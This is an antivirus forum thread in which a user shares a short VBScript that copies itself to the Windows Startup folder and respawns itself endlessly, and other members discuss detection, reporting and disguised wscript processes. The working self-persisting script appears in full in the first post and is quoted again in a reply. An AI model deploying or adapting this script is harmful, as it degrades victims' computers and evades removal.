Author Topic: Interesting virus  (Read 1702 times)

0 Members and 1 Guest are viewing this topic.

Offline lichesssatrancturkiye

  • Jr. Member
  • **
  • Posts: 30
Interesting virus
« on: November 22, 2021, 11:47:49 PM »
File name : file.vbs
Code: [Select]
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
when this program runs mouse cursor always runs and pc becomes laggy and this programs still runs after restart
it's easy to delete this virus (you can't delete file you should edit file like this
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing
but it's too interesting avast can't detect it
Notice : I tried close this virus with task manager but doesn't work and when this virus runs computer uses 100% cpu (because antivirus scans files again and again but can't detect anything also virus program runs himself every time )
« Last Edit: November 24, 2021, 02:37:06 PM by r@vast »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89053
  • No support PMs thanks
Re: Interesting virus
« Reply #1 on: November 23, 2021, 01:56:20 AM »
I suggest that you modify your post rather than post the code, post an image or wrap the code in code tags (as I have below).

Code: [Select]
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
when this program runs mouse cursor always runs and pc becomes laggy and this programs still runs after restart
it's easy to delete this virus (you can't delete file you should edit file like this
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing

But my preference would always to use an image.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Interesting virus
« Reply #2 on: November 23, 2021, 08:56:56 AM »
You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: Interesting virus
« Reply #3 on: November 23, 2021, 10:59:12 PM »
Do as DavidR suggests, we do not want malcreants  to abuse this in some way or other.  >:(

It is a legit Windows script, and as potentially malicious Avast should detect this as Win32:Vitro.

Typically, the wscript.exe executable can be located in "C:\Windows\System32",
 a Windows folder that contains operating system files.
However, if the wscript.exe filename is used to disguise malware,
this particular file is placed in another folder and/or will have a different name (for example, wcript.exe).

Typically, cyber criminals give names very similar to legitimate files to avoid suspicion.
Moreover when a malicious process is running in Task Manager, it should contain a graphic icon beside it,
when actually it should have a system icon.

One should note that virus detection engines sometimes detect legitimate files as threats
(this could provide  so-called 'false positive' results - FP's).

Submittal to avast as Asyn suggests in his posting may prevent this in the future for the "unaware".

All the more reason to be very suspicious with such Wscript shell virus examples.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: Interesting virus
« Reply #5 on: November 26, 2021, 06:36:20 PM »
Quote
The children of a WmiPrvSE process can often be the clue that helps identify suspicious behavior. If a wsmprovhost.exe process is identified on a system, it indicates PowerShell remoting activity. This process is executed on the remote, or target system.

source: SANS.org - could be part of WMI attacks.

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!